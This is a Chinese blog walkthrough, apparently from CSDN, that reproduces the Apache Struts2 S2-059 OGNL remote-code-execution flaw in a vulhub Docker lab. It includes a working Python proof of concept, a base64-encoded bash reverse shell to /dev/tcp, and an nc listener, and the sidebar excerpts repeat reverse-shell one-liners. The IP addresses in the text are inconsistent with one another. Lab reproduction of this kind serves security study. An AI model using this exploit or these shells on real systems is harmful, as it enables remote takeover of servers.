struts2 s2-059漏洞复现

最新推荐文章于 2024-04-26 09:25:31 发布
最新推荐文章于 2024-04-26 09:25:31 发布
阅读量3.7k 收藏 2
点赞数
分类专栏: 中间件漏洞复现 文章标签: 中间件 shell 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/109412342
版权

声明

好好学习,天天向上

漏洞描述

struts2框架

2020年8月13日,Apache官方发布了一则公告,该公告称Apache Struts2使用某些标签时,会对标签属性值进行二次表达式解析,当标签属性值使用了%{skillName}并且skillName的值用户可以控制,就会造成OGNL表达式执行。

影响范围

Struts 2.0.0 – Struts 2.5.20

复现过程

可以下载中间件系列,使用docker搭建

https://github.com/vulhub/vulhub

下载完成后,我这里把文件夹名字改了

cd vulhub-20201028/struts2/s2-05
docker-compose up -d

docker拉取后

浏览器访问

http://192.168.239.129:8080/?id=1

在这里插入图片描述

浏览器访问,F12,查看第一行,发现三三得九被执行

http://192.168.239.129:8080/?id=%25{3*3}

在这里插入图片描述

接下来,开始攻击,由于反弹shell的bash需要经过base64编码,先把反弹shell的代码确定,我这里是反弹到我的kali192.168.239.129

bash -i >& /dev/tcp/192.168.239.139/6666 0>&1

base64编码,编码网站:

http://www.jackson-t.ca/runtime-exec-payloads.html

编码后为

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzOS4xMzkvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}

POC脚本(python),这里需要改两个地方,第二行,把IP改成docker启动的struts2的IP,倒数第七行,exec(‘后面到倒数第六行,这里直接把编码后的粘贴进来,注意标点符号’))}",保存为s2-059.py

import requests
url = "http://192.168.239.129:8080"
data1 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"
}
data2 = {
    "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEyOC82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}'))}"
}
res1 = requests.post(url, data=data1)
# print(res1.text)
res2 = requests.post(url, data=data2)
# print(res2.text)

kali监听

nc -lvvp 6666

kali执行POC

python s2-059.py

成功反弹shell

在这里插入图片描述

维梓-
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
S2-057,S2-059,s2-061,s2-062漏洞
xiaobai_20190815的博客
04-12 2939
一、漏洞描述 当Struts2的标签属性值引用了action对象的参数值时,便会出OGNL表达式的二次解析,从而产生RCE风险(S2-059的修方式为只修了沙盒绕过并没有修OGNL表达式执行点,因为这个表达式执行触发条件过于苛刻,导致S2-061再次绕过了S2-059的沙盒) 二、影响版本 s2-057:<=Struts 2.3.34,Struts 2.5.16 s2-059:Struts 2.0.0 - Struts 2.5.20 s2-061:Struts 2.0.0-Strut
[旧文系列] Struts2历史高危漏洞系列-part6:S2-059/S2-061
mole_exp的博客
01-18 1387
文章目录关于<旧文系列>前言S2-059漏洞与分析可回显PoC漏洞S2-061漏洞与分析可回显PoC漏洞小结Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 https://forum.butian.net
命令执行漏洞【2】vulhub远程命令执行漏洞
最新发布
LfanBQX的博客
04-26 364
bash -i >& /dev/tcp/10.1.1.101/6666 0>&1 (被控制端未装nc,就可以使用bash(linux都能连接))在linux特有临时目录/tmp下创建空文件,由于通常该目录中不会存在该名称的文件,所以可以作为命令执行的验证命令.被控制端 nc 10.1.1.101 6666 -e /bin/bash。可看到在/tmp/路径下,已成功创建的success文件,说明漏洞利用成功。(1)s2-061漏洞。(2)s2-059漏洞
s2-059漏洞
Birdman-one的博客
12-11 1279
s2-059 Struts2介绍 是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控
【vulhub】Struts2 S2-059 远程代码执行漏洞(CVE-2019-0230)
weixin_42884199的博客
12-07 1077
前言 Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 影响版本: Struts 2.0.0 - Struts 2.5.20 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload view-source:http://192.168.150.146:8080/index.action?i
Struts2-059 远程代码执行漏洞(CVE-2019-0230)分析
weixin_46236101的博客
10-14 3103
前言 2020年8月13日虽然近几年来关于ONGL方面的漏洞已经不多了,但是毕竟是经典系列的RCE漏洞,还是有必要分析的。而且对于Struts2和OGNL了解也有助于代码审计和漏洞挖掘。 首先了解一下什么是OGNL,Object Graphic Navigation Language(对象图导航语言)的缩写,Struts框架使用OGNL作为默认的表达式语言。 struts2_S2_059和S2_029漏洞产生的原理类似,都是由于标签属性值进行二次表达式解析产生的,细微差别会在分析中提到。 漏洞利用前置条件是
struts2 s2-048漏洞
wodepzw的博客
11-19 403
我在docker中搭得的vulhub靶场 1.开启环境 命令 开启docker :service docker start 启动环境 :docker-compose up -d 2.环境启动好后访问http://your-ip:8080/showcase/ 3.这个漏洞在integraton下的struts1处 4.访问Integration/Struts 1 Integration: 5....
Struts2 漏洞之s2-045
weixin_51220765的博客
12-14 2716
Struts2 漏洞之s2-045 原理: 在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。 影响版本: Struts 2.3.5 - Struts 2.3.31 Struts 2.5 - Struts 2.5.10 1.进入045 cd vulhub-master/struts2/s2-045 2.开启045 docker-compose up -d
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
struts-2.5.16-源码+示例(S2-057漏洞演示环境)
08-24
S2-057漏洞,全称为"Struts2 OGNL注入漏洞",主要源于Struts 2框架处理用户输入时的不当验证和处理。OGNL (Object-Graph Navigation Language) 是一种强大的表达式语言,用于获取和设置Java对象的属性。在Struts 2中...
struts2 最新漏洞 S2-016、S2-017修补方案 .docx
08-01
Struts2 最新漏洞 S2-016、S2-017 修补方案 Struts2 是一个基于 Java 的 Web 应用程序框架,由 Apache 软件基金会维护。最近,Struts2 发生了两个严重的漏洞,分别是 S2-016 和 S2-017,这两个漏洞可能会导致攻击者...
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
S2-045 漏洞,官方称为“基于Struts2的Content-Type注入”,是在2017年被发的。这个漏洞存在于Struts2的Jakarta插件中,该插件处理HTTP请求头中的Content-Type字段时存在缺陷。攻击者可以通过精心构造的HTTP请求,...
struts2漏洞_Struts2 S2059远程代码执行漏洞(CVE20190230)
weixin_39989443的博客
12-10 249
作为一家专业的网络安全服务供应商,圣博润特别注重对最新安全漏洞的发和追踪,以“及时性、准确性、层次性”为宗旨,为用户提供漏洞预警、通告及响应服务。一、Struts2简介Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下...
Strtus2漏洞 - Struts2-052 Struts2-057 Struts2-059
HAKUNAMATATATTA的博客
12-29 767
S2-052 S2-057 S2-059漏洞过程
[ vulhub漏洞篇 ] struts2远程代码执行漏洞s2-059(CVE-2019-0230)
qq_51577576的博客
12-14 606
[ vulhub漏洞篇 ] struts2远程代码执行漏洞s2-059(CVE-2019-0230) 漏洞产生的主要原因是因为Apache Struts框架在强制执行时,会对分配给某些标签属性(如id)的属性值执行二次ognl解析。攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。
[Vulhub] Struts2 S2-057 S2-059 S2-061 漏洞
weixin_45605352的博客
06-07 1163
Struts2 S2-057 RCE (CVE-2018-11776) 0x00 漏洞描述 Apache Struts是一个在较为主流的开源框架,是用于使用Java编程语言开发Web应用程序。 定义XML配置时如果namespace值未设置且上层动作配置(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行。 url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行。 0x01 影响版本 Stru
vulhub漏洞系列之struts2(s2-048、s2-052、S2-053、s2-057、s2-059)
weixin_43071873的博客
12-11 1247
本来想把struts2剩下的靶场全部打完然后写博客分享给大家,但是vulhub搭建实在是太慢了!!!无奈只能先把好的这几个分享出来了。 ** (CVE-2017-9791)s2-048 ** 一、漏洞简介 当实用了Struts2 Struts1 插件时,可能导致不受信任的输入传入到ActionMessage类种导致命令执行 二、影响范围 2.3.x 三、漏洞: 进入靶场 第一个框填入${4*4},其余两个框随意填 可以看到计算结果回显出来了 Poc: %{(#dm=@ognl.OgnlCon
Struts2 S2-059漏洞-命令执行
帅醉了的博客
11-03 2649
Struts2 S2-059漏洞-命令执行 http://192.168.202.133:8080/?id=1把id=改成%25%7B233*233%7D 验证完毕 测试命令执行
s2-005漏洞
10-05
s2-005漏洞是指在Struts2框架中存在的一个安全漏洞。该漏洞的原理是Struts2会将HTTP请求中的每个参数名解析为OGNL表达式进行执行。攻击者可以通过编码绕过安全限制,执行恶意的代码。 该漏洞的影响版本是Struts 2.0.0-2.1.8.1。你可以在vulhub的GitHub仓库中找到搭建了该漏洞的示例环境。首先,你可以使用能够爆出路径的payload验证目标网址是否存在s2-005漏洞。然后,使用执行代码的payload进行利用。需要注意的是,不同的博主可能会提供不同的payload,所以如果一个payload无法利用,可以尝试其他的payload。 关于具体的漏洞步骤和细节,请参考相关资源和教程。由于时间和篇幅的限制,无法提供完整的过程。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值